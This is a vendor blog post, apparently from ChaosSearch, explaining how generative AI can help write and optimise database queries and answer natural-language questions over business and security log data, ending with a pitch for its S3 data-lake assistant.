How to use GenAI for database query optimization and natural language analysis
In the past, querying a database required Structured Query Language (SQL) skills, or knowledge of other database query languages, such as Kibana Query Language (KQL). Today, with the emergence of generative AI (GenAI), teams can query their analytic database using natural language — and get plain English results in return.
Or, if you prefer to still use SQL, many teams use GenAI for database query optimization, making queries faster and more efficient. These AI-driven recommendations can simplify the process of searching for information, making it easier for anyone to make data-driven business decisions.
Let’s explore how to use generative AI with databases, including data lakes, and how it can make asking questions of your data much easier for business users.
What is generative AI?
Large language models (LLMs) and their use in databases
With the launch of tools like OpenAI’s ChatGPT, GenAI has captured mainstream attention. GenAI’s breadth and depth of use cases has led to an explosion of new applications ranging from code assistants to writing tools. The foundational models upon which these tools are built, or Large Language Models (LLMs), are trained using massive datasets, so they can recognize and interpret natural language fairly accurately.
By their very nature, natural language queries (like questions written in plain English) are classified as unstructured queries, since they do not follow any specific type of format or rules. Structured queries, like a SQL query for example, are highly structured and are intended to retrieve a specific result from a relational database.
Over time, databases have evolved to support different types of data models and querying formats. Today’s multi-model databases support multiple data models and allow users to query both structured data (think columns in a spreadsheet) and unstructured data. OpenAI integrations create even more opportunities for true multi-model databases, giving users the opportunity to query data and get answers using simple, natural language questions.
Generally speaking, LLMs hold great promise, but have some known pitfalls. Hallucination (when the system makes up facts), costs, and security are among the top concerns. For example, many enterprises do not want to share their data with publicly available LLMs for data privacy and security concerns. However, new technologies leverage the best of LLMs and databases, so teams can explore data in natural language and get deterministic analytical results based on their data, without any raw data being shared with LLM.
How to use AI-driven queries with your database
There are a few different ways you can use GenAI with your database. Let’s start with the database query optimization use case. If you write your own SQL queries, you know this process can be complex. You don’t always get the desired results from your data the first time around, and queries against complex datasets can take a long time to execute. GenAI can help you write, debug, and optimize SQL or Elasticsearch queries in less time — resulting in better performance from your database and faster data analysis times.
Or, you may choose to use GenAI to execute queries and go straight from natural language to results from your data. Imagine talking to your data and having your data talk to you.
Using artificial intelligence for threat hunting
For example, in a cybersecurity setting, GenAI can be used for threat hunting. A security analyst can use an unstructured query in plain language, such as “Which threat commands should I look for in a Linux operating system?” Monitoring for these commands in log data or process data can help proactively identify and detect threats.
AI technology in a database might respond with specific commands that bad actors might use to exploit your system. For example, they may be executing commands to:
- Escalate privileges
- Gain unauthorized root access
- Download remote files containing malicious code or tools
- Establish reverse shells used for creating backdoors for unauthorized access
- Take other actions in your system that may mimic the behavior of an administrator, and otherwise go unnoticed.
From there, you can use GenAI to ask your database to write a search query that looks for those commands.
Exploring business data and generating insights in natural language
While many business analysts are SQL power users, natural language querying capabilities can open up opportunities for SQL novices to explore datasets and ask certain questions. Alternately, AI technology can make it much easier and faster for business analysts to do their jobs and make data-driven recommendations.
For example, an ecommerce analyst may want to explore a variety of customer data — slicing and dicing by different datasets such as customer views, line item views, or order views. One possibility may be to search the customer dataset to determine which regions have the highest number of customers using a natural language query.
Or, they may wish to execute more complex queries that analyze data across multiple datasets, such as: “What is the relationship between customer demographics and order values?” or “How do supplier choices impact product availability and order fulfillment?” The analyst can ask the GenAI tool to write a SQL query that answers these questions, and copy/paste the query into Superset (SQL) and/or OpenDashboards (Elasticsearch) to get the desired results.
Querying an Amazon S3 data lake with GenAI
Using a tool like ChaosSearch combined with Chaos AI Assistant, organizations can query their data lake directly in S3 — in natural language, without data movement. Chaos Assistant is a Large Language Model (LLM) powered chat module that enables users to interact with their Amazon S3 data in natural language.
Via integrations with OpenAI’s ChatGPT and Amazon Bedrock’s Claude 2, users can now leverage the best of LLMs (i.e. ability to interact in natural language) and of Chaos LakeDB (live deterministic results at scale at a fraction of the cost).
Users can ask questions of their ChaosSearch data to better understand how to leverage it for their high-level goals, or go straight from question to query to results via the ChaosSearch platform. All of this is done without sharing any raw data contents with the LLM (only schema is used for prompting to give LLM context from the start).
AI technology and databases: democratizing data analytics
We’ve covered multiple use cases for LLMs and GenAI in databases in an analytics context, including:
- Writing, optimizing or debugging SQL or Elasticsearch queries
- Querying your data in natural language and getting immediate answers to questions.
The goal for LLMs and GenAI is to help analysts and business users gain more value from their data, without requiring the technical expertise to write database queries in a certain structured format. This technology has the potential to democratize data access and analytics across a larger population of business users, allowing them to get more value out of their business data and execute on data-driven decision-making at scale.